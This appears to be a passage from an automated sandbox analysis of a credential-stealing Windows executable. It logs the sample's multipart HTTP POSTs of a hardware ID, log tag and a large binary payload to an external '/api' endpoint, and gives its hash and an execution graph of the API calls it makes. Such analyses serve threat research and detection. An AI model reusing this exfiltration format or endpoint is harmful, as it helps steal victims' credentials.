                                                                              2024-11-23 20:08:19 UTC1190OUTData Raw: 2d 2d 4b 50 55 35 4a 5a 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 33 43 35 44 46 33 39 30 37 32 31 36 39 38 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 4b 50 55 35 4a 5a 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 50 55 35 4a 5a 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4b 50 55 35 4a 5a 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                              Data Ascii: --KPU5JZ60Content-Disposition: form-data; name="hwid"F53C5DF390721698D7CBBD6DF28D3732--KPU5JZ60Content-Disposition: form-data; name="pid"1--KPU5JZ60Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--KPU5JZ60Content-Di
                                                                              2024-11-23 20:08:20 UTC1012INHTTP/1.1 200 OK
                                                                              Date: Sat, 23 Nov 2024 20:08:20 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=h0p070neop0avb9ngir7f22aup; expires=Wed, 19-Mar-2025 13:54:59 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G9BSBZ48QLRflB6wjF%2BuLsN7NZ8Oc32xUscYOEhDJ2UGhl6MGKk9szWSVjXNOoqwS1vO0cfYOvxwQav9Ej73o%2Bg85CurMholTy8jXlcfxXh8aWBNPcwymC43ErmFGG8KWQ1Gypg%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e73ca651ba141ad-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1580&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2099&delivery_rate=1784841&cwnd=182&unsent_bytes=0&cid=fe4d48ca7df3a2ea&ts=715&x=0"
                                                                              2024-11-23 20:08:20 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                              Data Ascii: eok 8.46.123.75
                                                                              2024-11-23 20:08:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.1049733104.21.33.1164437616C:\Users\user\Desktop\file.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-23 20:08:22 UTC280OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=YN7UDN0HV85XO
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 586157
                                                                              Host: property-imper.sbs
                                                                              2024-11-23 20:08:22 UTC15331OUTData Raw: 2d 2d 59 4e 37 55 44 4e 30 48 56 38 35 58 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 33 43 35 44 46 33 39 30 37 32 31 36 39 38 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 59 4e 37 55 44 4e 30 48 56 38 35 58 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 4e 37 55 44 4e 30 48 56 38 35 58 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 59 4e 37 55 44
                                                                              Data Ascii: --YN7UDN0HV85XOContent-Disposition: form-data; name="hwid"F53C5DF390721698D7CBBD6DF28D3732--YN7UDN0HV85XOContent-Disposition: form-data; name="pid"1--YN7UDN0HV85XOContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--YN7UD
                                                                              2024-11-23 20:08:22 UTC15331OUTData Raw: 50 cb 6f df 7c 53 aa 59 d0 44 ca 82 08 12 16 81 f5 15 7a 3b a2 fc fc f8 81 a5 1a 56 0b d7 81 b1 38 87 d6 4c 27 7d 51 7e 7d 53 a4 2b 25 d8 11 81 b1 ef 81 d7 6b 5a de dd df 5b cd 6b b2 81 d7 a7 76 30 87 03 8f 8c 29 b9 2c 44 c8 f1 03 11 ba 7e 9d 21 1a eb 9d c0 cc 33 f2 11 41 71 f6 0c d3 54 62 e0 ed 18 83 33 1d d6 10 fd b0 64 2f 1f b8 9c 94 ee e0 86 03 4d 72 1c 5b 63 74 ac 48 a6 43 29 24 ab 02 53 44 b8 45 1a 54 3f f6 e7 94 f0 b8 2f 08 42 ed 92 f4 72 e4 40 31 c3 61 82 59 cb 93 2a 3b 53 9a f1 94 2a 33 19 f5 41 58 9a 51 04 ac 5d 77 a6 8b 8a 31 85 e7 31 f3 46 a9 db 4d 01 2e 72 ac 7a 47 41 0e 69 4d ae 86 f1 20 c3 3b f8 90 20 99 44 45 7c 0a ef 96 e4 5a 77 10 ac 27 92 ff 3c 5c 1f 0b fb fe 82 36 b6 63 42 15 be 2a 55 f7 09 e4 80 c4 a5 11 e6 44 cb 75 ae b7 c2 a7 21 c7
                                                                              Data Ascii: Po|SYDz;V8L'}Q~}S+%kZ[kv0),D~!3AqTb3d/Mr[ctHC)$SDET?/Br@1aY*;S*3AXQ]w11FM.rzGAiM ; DE|Zw'<\6cB*UDu!
                                                                              2024-11-23 20:08:22 UTC15331OUTData Raw: 66 b0 d7 36 84 e4 28 6b ae 3e d0 34 e6 bc 79 86 2a e0 61 19 34 b8 fc 87 4f a5 a9 6c 30 55 e8 c9 92 fc 6f 4c 11 84 63 06 07 59 aa 13 bc e3 16 ad 94 aa e2 76 d1 43 14 8c 33 cd 62 75 d1 24 d4 c6 8b 4f 2b df 65 d7 6b c5 6e 28 d1 f5 27 e5 1b ee 4e a3 1a ca ca b7 75 16 12 72 8d 3c 88 7b 55 3e c5 55 eb 89 90 58 5e 5f 4d 48 1e b8 dc 32 ac 44 f7 3f a1 1d 65 59 2b 5c af f4 b3 d9 59 74 35 1c 46 8c 73 e6 11 77 ef 8b d6 36 39 1a 1c e4 bb f0 e3 47 e8 cc dc b9 98 8c f9 12 4d c0 03 4d 4b 77 2d 27 a0 48 ad af 6a fa b6 5a a4 90 bf a9 e3 0e c9 2c a4 7b b3 e9 ac 20 aa ee 0f bb af ed 4a 0d 21 fb 58 a3 a9 ce eb 0a 63 8d a8 89 2b c0 ea 21 85 30 47 58 95 fc 59 44 3a e3 ec 30 27 3f a2 98 66 43 c9 86 13 9c 24 6a 95 c6 e8 97 31 11 c1 c4 d9 2f 13 5b 42 ad 9f a9 08 ec 2a d6 c4 68 8d
                                                                              Data Ascii: f6(k>4y*a4Ol0UoLcYvC3bu$O+ekn('Nur<{U>UX^_MH2D?eY+\Yt5Fsw69GMMKw-'HjZ,{ J!Xc+!0GXYD:0'?fC$j1/[B*h
                                                                              2024-11-23 20:08:22 UTC15331OUTData Raw: b3 b5 5e 3d 00 77 4a 13 6c 80 8a f4 f2 c6 a1 70 ca 7a d8 e1 87 7c 29 8c 73 10 ca cc dd 0f b8 1f e9 b3 98 15 a2 64 58 fd 89 c9 55 79 32 d7 a8 bc 6f a0 f3 a3 6f cb 25 a5 70 a6 aa 02 d6 67 cc be 75 85 c4 9b e1 b6 ff d5 b1 ca 65 8a 44 86 10 1f ee c3 c0 22 63 79 4d 4b 39 9a cc fa cc 0d f8 4e 5d c7 67 98 00 6c c6 56 7c 9a 55 3b 7b f2 bd 6b f1 75 2e 59 72 93 d3 5e 77 55 ef 58 de c5 28 51 93 52 1f 3f f7 f9 26 f4 ea 9e db 94 69 57 2b 29 e4 e6 f8 07 22 17 d0 e7 fe 04 8a 61 dd 8c 9b 1a 08 55 7a d0 07 cf 66 b0 b8 1d 4a f7 d7 c0 b4 93 e2 ad a6 ca 04 e6 89 06 8e 72 1c e5 38 ad aa 88 0e 9e 56 4a 9d 0b e4 8a cc a7 c2 73 f0 43 5a cd cf b8 94 bf aa 3e 6b 61 95 47 bd 0c 20 a5 18 29 34 2f 05 eb 44 86 f9 cd ff 2e 14 bb 01 3e 2c 56 8e 5e aa 13 13 b8 61 66 60 8f 20 90 2f ec 1b
                                                                              Data Ascii: ^=wJlpz|)sdXUy2oo%pgueD"cyMK9N]glV|U;{ku.Yr^wUX(QR?&iW+)"aUzfJr8VJsCZ>kaG )4/D.>,V^af` /
                                                                              2024-11-23 20:08:22 UTC15331OUTData Raw: e9 3b 63 98 dd e1 f3 5b 99 f1 2b b7 8e db a4 45 89 1d e5 f9 81 30 85 91 f9 6f 1c c2 c9 56 73 c2 3c ae 27 13 54 05 04 03 7c 46 45 de fd ae 31 f5 36 b1 ce 40 dd e6 1c 51 94 b8 b0 fd c1 db 32 2d ba 54 3b f9 91 11 ea 6e f7 8c f0 2b 0e 57 58 66 f4 3d 31 95 0f 45 16 86 b8 d3 fa d3 b3 1d 41 a4 2b 6c 6f b6 b4 f2 95 21 0f 37 0e 8c 36 c1 b4 2c b1 5a 90 f1 d9 7e 39 b9 e3 0c 37 0e 0d 19 4a bc 6c b5 bc bd c3 47 14 3d 6a 61 db 8d 9b c4 34 0c 44 3a fe e7 af fe 7f 2f 56 5c 60 6d 12 66 8e 82 94 2b 88 fa 80 5b 48 2d 24 a8 3c 37 9c 4a 40 91 21 7e c7 ce 46 4f d1 9a 5a 79 04 32 e1 75 58 80 9c 96 9d e7 fa cc 0b 6e 71 79 9f 0b 47 5f c5 bd a5 7c 6b 7c 79 bf 48 fa bf 1b dc e9 2f 9f d7 ea c6 6f df 83 7e f0 db 31 c8 ae 92 ce 5e b9 36 00 f6 84 26 05 d8 6b f1 44 02 b4 93 61 d3 46 89
                                                                              Data Ascii: ;c[+E0oVs<'T|FE16@Q2-T;n+WXf=1EA+lo!76,Z~97JlG=ja4D:/V\`mf+[H-$<7J@!~FOZy2uXnqyG_|k|yH/o~1^6&kDaF
                                                                              2024-11-23 20:08:22 UTC15331OUTData Raw: a5 aa 26 f8 29 a5 00 bb df 1b 71 f7 b0 2f b8 f3 bb e7 7b 2b bb 28 d8 6b 57 75 bb 39 d8 24 9c aa c4 6a df f4 14 e4 6d 6d 65 59 6c c6 62 bd 2e 0b 7f 3a 65 b1 eb e4 44 0f 9c 61 39 ef 3e 83 db 7d 4f 78 e5 6d 7d 18 4f 72 e9 e2 35 a1 67 5d ce c2 73 13 b1 08 bf 83 78 3c de 29 cd 40 0f 1d 9a c2 ef 2a 15 f3 d5 96 31 f5 e7 45 5f 18 17 90 e0 7e a7 86 f3 01 f2 56 2c fd c3 ae 14 d9 f4 e9 85 ce e0 a1 a2 42 c7 1d 19 a3 b0 d3 f9 ca 27 a5 70 6d 5c 58 8f 5f 56 6d 7d a7 48 b3 82 96 56 e9 4f 63 a2 00 f5 af f3 e7 84 77 af a0 29 95 59 7b 47 66 89 2a f9 5f 9f 15 da eb c5 f6 47 72 22 82 4e 9d 64 9b 55 3b 9f d7 2b 68 bd 46 f6 68 25 20 8c a0 60 d1 55 88 d1 57 1e 76 ea a7 db 78 b5 3c f6 b9 15 6a 6c 58 95 4f 2b 9a 92 52 27 76 84 89 3d cd a1 b4 7f ff 20 f7 8f 2d 85 dc f1 04 62 53 43
                                                                              Data Ascii: &)q/{+(kWu9$jmmeYlb.:eDa9>}Oxm}Or5g]sx<)@*1E_~V,B'pm\X_Vm}HVOcw)Y{Gf*_Gr"NdU;+hFh% `UWvx<jlXO+R'v= -bSC
                                                                              2024-11-23 20:08:22 UTC15331OUTData Raw: fd 52 29 41 f9 d8 17 f2 b1 2f cc 77 fd 36 4a dc 8d 0b 40 1c 85 3d 88 c8 80 e0 0d f9 51 e7 b1 63 95 87 c6 ff b2 bc 2d a4 4a 91 a1 cb 90 64 6d 29 22 63 8a 53 45 6f f1 be db d3 92 54 b9 aa ba 22 ae 51 f1 c9 03 f4 3a d9 85 a0 18 52 fe de d5 62 2a fc 0b 4b 93 4b b9 b5 7a 89 98 d9 6b 23 e6 b0 49 ff 97 4c 5d 45 5e df 51 8e 16 a5 9f 5e 22 b0 f3 c0 de bc 94 e0 2f 01 8b 8f 64 c3 ee fb ac 86 b7 b1 8f 6d 9b a5 7f fd 78 f1 8b ff fc bd 49 d6 c0 08 9b f9 6f 5d f5 51 d6 9f ea 47 77 1c ab 8f 22 41 46 c3 7c 30 f7 15 2e e0 39 34 f0 b8 76 a1 5a 1c 54 05 96 d8 1e 45 52 b4 b5 21 8a 46 23 bb b6 48 85 f5 8c f6 cd 56 17 9b e2 00 18 87 9e e8 5f bc fa 65 9c 10 ff e5 a8 fe 0b 3b 73 9f be cf 59 68 10 c5 a7 0b b2 3b ae 71 83 f7 fb 80 66 09 39 4f 72 65 23 b0 cb b3 f5 43 29 de 98 7b e3
                                                                              Data Ascii: R)A/w6J@=Qc-Jdm)"cSEoT"Q:Rb*KKzk#IL]E^Q^"/dmxIo]QGw"AF|0.94vZTER!F#HV_e;sYh;qf9Ore#C){
                                                                              2024-11-23 20:08:22 UTC15331OUTData Raw: 9e b7 ca 7c 72 8a 3c 92 e7 ff ef 77 83 d6 90 97 dc 8d 97 a0 eb 2a b7 61 c2 de 3c 8c 57 be c7 88 7c 48 2c 67 ea f0 20 37 d7 90 5e c7 5d 16 d5 19 bb 53 f6 c2 e7 0c 43 d9 0e 87 4b ad 63 5e 83 ce 46 b7 05 ef 87 1d 61 bf 1c e6 ce 88 09 b2 64 6e d4 2b b6 cc 3b 80 2f 58 5c a3 7e 50 d0 46 1b 74 fe 0c 28 05 97 cd e9 bb 8c e2 ae 05 3e 5c 29 52 b8 0f 22 9d 7f 27 ec 38 f9 3f 08 82 e2 0d 74 5f 05 ed c8 8a 24 7b 6a 33 d9 ce da e2 4a ae f7 3e 49 a5 0e bb 34 e6 46 7e 6c 9c 32 62 77 80 85 60 ff b6 90 32 c4 cf e5 a9 ff 91 ce 8e 71 b1 21 1a f8 14 9b 5a 0e 2f 72 98 1f ee 59 e9 41 cf f5 e8 40 35 1d 80 be 36 75 59 2d 28 6e 79 ae 7d c3 17 49 3f 43 09 a7 cc 50 cc ef a8 cb ab ed 2c 4f 41 60 b4 fa e5 76 fa 3c 1c 8b 15 b5 22 ee db 09 ac 67 4e 0d 13 c6 de 89 18 a1 18 bd 46 99 71 f6
                                                                              Data Ascii: |r<w*a<W|H,g 7^]SCKc^Fadn+;/X\~PFt(>\)R"'8?t_${j3J>I4F~l2bw`2q!Z/rYA@56uY-(ny}I?CP,OA`v<"gNFq
                                                                              2024-11-23 20:08:22 UTC15331OUTData Raw: 1f 41 81 58 0c 4f 67 25 6e 9a 2f 37 f9 06 14 c9 c3 c2 65 a8 54 5f 43 e7 e5 bf 9d 76 75 a9 08 5d 1e 31 ba cc 27 80 aa e1 74 9d 62 f7 a4 c2 c1 47 56 88 36 90 23 91 5c 57 90 9f 6f 16 e5 c3 08 c9 4b 4e 53 9c 5f 86 ed 58 e5 fa 43 1b 82 0c ab 15 a0 d1 c2 36 75 ed 6d 01 97 45 c1 3d 84 b5 02 45 16 d5 28 9a 5b fb 7e 53 47 a0 c7 74 9f c1 d5 e2 1d 5e 65 01 63 13 e3 56 50 bc 07 57 fe 6e d8 8e ff d4 42 19 ca 8c 3a 12 1d 51 74 12 af bf 8d 29 74 a0 56 bf e7 ac aa 88 e4 f0 8a 9a 73 c6 32 f2 a8 1b f7 2d 9a 83 af be 8a 3d 85 76 4e a6 e8 9e 37 dc 48 27 77 b1 34 5f d7 89 2b e1 89 e9 66 81 33 b3 97 f0 d6 9b 03 83 e9 4a d2 05 98 5c ba 75 93 9e 23 89 3c 77 72 9a c7 3e ca c2 75 35 07 29 cf db 36 6b 7b 70 65 06 03 63 03 bc 18 7f 17 c7 11 57 87 6b 26 a2 c1 05 c4 45 bd 34 f2 da dd
                                                                              Data Ascii: AXOg%n/7eT_Cvu]1'tbGV6#\WoKNS_XC6umE=E([~SGt^ecVPWnB:Qt)tVs2-=vN7H'w4_+f3J\u#<wr>u5)6k{pecWk&E4
                                                                              2024-11-23 20:08:22 UTC15331OUTData Raw: 09 51 51 5e e1 c8 91 0f 44 14 e6 4b 1f 4d 9a 83 8d f5 1a 68 10 a5 89 58 01 4a 11 7b c3 0a 39 80 6c 57 13 dc 06 50 12 a8 f9 dc a2 64 b5 ee 0f a6 e5 88 98 dd be 87 77 ad e3 a8 17 c7 b4 07 a3 9c 1b f5 bb 19 82 10 41 48 74 d8 61 3e c7 9f 7d 60 5d fe 96 a9 d1 27 24 2a 76 7a b6 6b ba f0 0e ca eb 6f 02 97 5a 23 53 85 4d b5 38 45 c9 f8 7a b3 45 35 89 7c 65 94 07 35 12 42 9c d4 0f 38 0b 82 ee 00 e2 65 31 1c 55 42 a4 e9 95 d2 16 a1 9d 66 26 82 2a ca 03 58 db 94 b6 95 c4 83 f5 a6 05 63 72 aa 2d f2 49 3a d8 4e 2f 60 66 3c 75 90 ab 04 03 16 b6 4c fb 51 c7 f3 94 7b 6e b3 78 1e a8 bd 56 43 c5 c6 1b 8f b7 70 91 9c 91 b9 51 be b8 ea b2 c9 c8 b3 ea b6 42 0b f7 3b d9 22 ff 72 df 7c 7b 53 7f fb 68 58 a2 c0 aa 7b f1 e8 de 4b 06 42 92 fc b3 06 74 bf 78 f7 bd 31 ed 16 46 1c fd
                                                                              Data Ascii: QQ^DKMhXJ{9lWPdwAHta>}`]'$*vzkoZ#SM8EzE5|e5B8e1UBf&*Xcr-I:N/`f<uLQ{nxVCpQB;"r|{ShX{KBtx1F
                                                                              2024-11-23 20:08:29 UTC1027INHTTP/1.1 200 OK
                                                                              Date: Sat, 23 Nov 2024 20:08:29 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=qa73prkk367omou7j7ivaqfft1; expires=Wed, 19-Mar-2025 13:55:06 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=85RmrrPHTDpD2py9l6uRVp6lMzxnhrfB0%2F5YJ9pEVlNyKgA1f2LxUzvGXvFzQgq0%2BxqtFS%2F0IOKERyjsmpMqPlrHUWnQWZ%2FPEgHY9bvUB3jlWbh%2BktECKwBQECScm%2FjEMwPTgdk%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e73ca78fd0842c3-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1597&sent=388&recv=536&lost=0&retrans=0&sent_bytes=2846&recv_bytes=588745&delivery_rate=1766485&cwnd=203&unsent_bytes=0&cid=aa1fd08fbfd6a81e&ts=6456&x=0"


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Target ID:5
                                                                              Start time:15:08:03
                                                                              Start date:23/11/2024
                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                                              Imagebase:0x2d0000
                                                                              File size:1'866'752 bytes
                                                                              MD5 hash:5E73B0576450ED5FFD50F136A205A42E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.1409970850.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:10.7%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:67.1%
                                                                                Total number of Nodes:231
                                                                                Total number of Limit Nodes:15
                                                                                execution_graph 6910 2de88f 6911 2de88e 6910->6911 6911->6910 6913 2de89c 6911->6913 6916 30df70 LdrInitializeThunk 6911->6916 6915 2de948 6913->6915 6917 30df70 LdrInitializeThunk 6913->6917 6916->6913 6917->6915 6960 2dc32b 6961 30ded0 2 API calls 6960->6961 6962 2dc338 6961->6962 6657 2dcf05 6658 2dcf20 6657->6658 6663 309030 6658->6663 6660 2dcf7a 6661 309030 5 API calls 6660->6661 6662 2dd3ca 6661->6662 6664 309090 6663->6664 6664->6664 6666 3091b1 SysAllocString 6664->6666 6668 30966a 6664->6668 6665 30969c GetVolumeInformationW 6671 3096ba 6665->6671 6667 3091df 6666->6667 6667->6668 6669 3091ea CoSetProxyBlanket 6667->6669 6668->6665 6669->6668 6672 30920a 6669->6672 6670 309658 SysFreeString SysFreeString 6670->6668 6671->6660 6672->6670 6673 2d89a0 6677 2d89af 6673->6677 6674 2d8cb3 ExitProcess 6675 2d8cae 6682 30deb0 6675->6682 6677->6674 6677->6675 6681 2dce80 CoInitializeEx 6677->6681 6685 30f460 6682->6685 6684 30deb5 FreeLibrary 6684->6674 6686 30f469 6685->6686 6686->6684 6692 2f1960 6693 2f19d8 6692->6693 6698 2e9530 6693->6698 6695 2f1a84 6696 2e9530 LdrInitializeThunk 6695->6696 6697 2f1b29 6696->6697 6699 2e9560 6698->6699 6710 310480 6699->6710 6701 2e962e 6702 2e96ca 6701->6702 6703 2e974b 6701->6703 6704 310480 LdrInitializeThunk 6701->6704 6706 2e9756 6701->6706 6708 2e9783 6701->6708 6702->6695 6720 3107b0 6703->6720 6704->6701 6706->6702 6706->6708 6714 310880 6706->6714 6708->6702 6724 30df70 LdrInitializeThunk 6708->6724 6711 3104a0 6710->6711 6712 3105be 6711->6712 6725 30df70 LdrInitializeThunk 6711->6725 6712->6701 6715 3108b0 6714->6715 6718 3108fe 6715->6718 6726 30df70 LdrInitializeThunk 6715->6726 6716 3109ae 6716->6708 6718->6716 6727 30df70 LdrInitializeThunk 6718->6727 6722 3107e0 6720->6722 6721 31082e 6721->6706 6722->6721 6728 30df70 LdrInitializeThunk 6722->6728 6724->6702 6725->6712 6726->6718 6727->6716 6728->6721 6918 30bce0 6919 30bd5a 6918->6919 6920 30bcf2 6918->6920 6920->6919 6922 30bd52 6920->6922 6926 30df70 LdrInitializeThunk 6920->6926 6924 30bede 6922->6924 6927 30df70 LdrInitializeThunk 6922->6927 6924->6919 6928 30df70 LdrInitializeThunk 6924->6928 6926->6922 6927->6924 6928->6919 6942 310a00 6943 310a30 6942->6943 6946 310a7e 6943->6946 6948 30df70 LdrInitializeThunk 6943->6948 6944 310b2e 6946->6944 6949 30df70 LdrInitializeThunk 6946->6949 6948->6946 6949->6944 6955 3102c0 6957 3102e0 6955->6957 6956 31041e 6957->6956 6959 30df70 LdrInitializeThunk 6957->6959 6959->6956 6729 2de0d8 6730 2de100 6729->6730 6732 2de16e 6730->6732 6786 30df70 LdrInitializeThunk 6730->6786 6734 2de22e 6732->6734 6787 30df70 LdrInitializeThunk 6732->6787 6745 2f5e90 6734->6745 6736 2de29d 6753 2f6190 6736->6753 6738 2de2bd 6763 2f7e20 6738->6763 6742 2de2e6 6783 2f8c90 6742->6783 6744 2de2ef 6749 2f5f30 6745->6749 6746 2f6026 6788 2f1790 6746->6788 6748 2f6020 6748->6736 6749->6746 6749->6748 6750 2f60b5 6749->6750 6794 310f60 6749->6794 6752 2f1790 2 API calls 6750->6752 6752->6748 6754 2f619e 6753->6754 6827 310b70 6754->6827 6756 2f6020 6756->6738 6757 310f60 2 API calls 6762 2f5fe0 6757->6762 6758 2f6026 6758->6758 6760 2f1790 2 API calls 6758->6760 6759 2f60b5 6759->6759 6761 2f1790 2 API calls 6759->6761 6760->6759 6761->6756 6762->6756 6762->6757 6762->6758 6762->6759 6764 2f80a0 6763->6764 6767 2f7e4c 6763->6767 6769 2f80d7 6763->6769 6773 2de2dd 6763->6773 6832 30ded0 6764->6832 6765 310f60 2 API calls 6765->6767 6767->6764 6767->6765 6767->6767 6768 310b70 LdrInitializeThunk 6767->6768 6767->6769 6767->6773 6768->6767 6770 310b70 LdrInitializeThunk 6769->6770 6769->6773 6774 30df70 LdrInitializeThunk 6769->6774 6838 310c80 6769->6838 6846 311580 6769->6846 6770->6769 6775 2f8770 6773->6775 6774->6769 6776 2f87a0 6775->6776 6777 2f882e 6776->6777 6858 30df70 LdrInitializeThunk 6776->6858 6778 30b7e0 RtlAllocateHeap 6777->6778 6782 2f895e 6777->6782 6780 2f88b1 6778->6780 6780->6782 6859 30df70 LdrInitializeThunk 6780->6859 6782->6742 6860 2f8cb0 6783->6860 6785 2f8c99 6785->6744 6786->6732 6787->6734 6793 2f17a0 6788->6793 6790 2f1861 6790->6790 6791 2f183e 6790->6791 6806 2f3d70 6790->6806 6791->6750 6793->6790 6793->6791 6802 310610 6793->6802 6796 310f90 6794->6796 6795 310fde 6797 30b7e0 RtlAllocateHeap 6795->6797 6799 3110ae 6795->6799 6796->6795 6825 30df70 LdrInitializeThunk 6796->6825 6800 31101f 6797->6800 6799->6749 6800->6799 6826 30df70 LdrInitializeThunk 6800->6826 6803 310630 6802->6803 6804 31075e 6803->6804 6818 30df70 LdrInitializeThunk 6803->6818 6804->6790 6807 310480 LdrInitializeThunk 6806->6807 6809 2f3db0 6807->6809 6808 2f44c3 6808->6791 6809->6808 6819 30b7e0 6809->6819 6812 2f3dee 6815 2f3e7c 6812->6815 6822 30df70 LdrInitializeThunk 6812->6822 6813 30b7e0 RtlAllocateHeap 6813->6815 6814 2f4427 6814->6808 6824 30df70 LdrInitializeThunk 6814->6824 6815->6813 6815->6814 6823 30df70 LdrInitializeThunk 6815->6823 6818->6804 6820 30b800 6819->6820 6820->6820 6821 30b83f RtlAllocateHeap 6820->6821 6821->6812 6822->6812 6823->6815 6824->6814 6825->6795 6826->6799 6828 310b90 6827->6828 6830 310c4f 6828->6830 6831 30df70 LdrInitializeThunk 6828->6831 6830->6762 6831->6830 6833 30deea 6832->6833 6834 30df3e 6832->6834 6837 30df44 6832->6837 6836 30df29 RtlReAllocateHeap 6833->6836 6833->6837 6835 30b7e0 RtlAllocateHeap 6834->6835 6835->6837 6836->6837 6837->6769 6839 310cb0 6838->6839 6839->6839 6840 310cfe 6839->6840 6854 30df70 LdrInitializeThunk 6839->6854 6840->6840 6841 30b7e0 RtlAllocateHeap 6840->6841 6845 310e0f 6840->6845 6843 310d8b 6841->6843 6843->6845 6855 30df70 LdrInitializeThunk 6843->6855 6845->6769 6845->6845 6847 311591 6846->6847 6848 31163e 6847->6848 6856 30df70 LdrInitializeThunk 6847->6856 6849 30b7e0 RtlAllocateHeap 6848->6849 6852 3117de 6848->6852 6851 3116ae 6849->6851 6851->6852 6857 30df70 LdrInitializeThunk 6851->6857 6852->6769 6854->6840 6855->6845 6856->6848 6857->6852 6858->6777 6859->6782 6861 2f8d10 6860->6861 6861->6861 6870 30b8e0 6861->6870 6863 2f8d6d 6863->6785 6865 2f8d45 6865->6863 6868 2f8e66 6865->6868 6878 30bb20 6865->6878 6882 30c040 6865->6882 6869 2f8ece 6868->6869 6890 30bfa0 6868->6890 6869->6785 6871 30b900 6870->6871 6872 30b93e 6871->6872 6894 30df70 LdrInitializeThunk 6871->6894 6873 30b7e0 RtlAllocateHeap 6872->6873 6875 30ba1f 6872->6875 6876 30b9c5 6873->6876 6875->6865 6876->6875 6895 30df70 LdrInitializeThunk 6876->6895 6879 30bbce 6878->6879 6880 30bb31 6878->6880 6879->6865 6880->6879 6896 30df70 LdrInitializeThunk 6880->6896 6884 30c090 6882->6884 6883 30c0d8 6885 30c73e 6883->6885 6887 30c6cf 6883->6887 6889 30df70 LdrInitializeThunk 6883->6889 6884->6883 6897 30df70 LdrInitializeThunk 6884->6897 6885->6865 6887->6885 6898 30df70 LdrInitializeThunk 6887->6898 6889->6883 6891 30bfc0 6890->6891 6893 30c00e 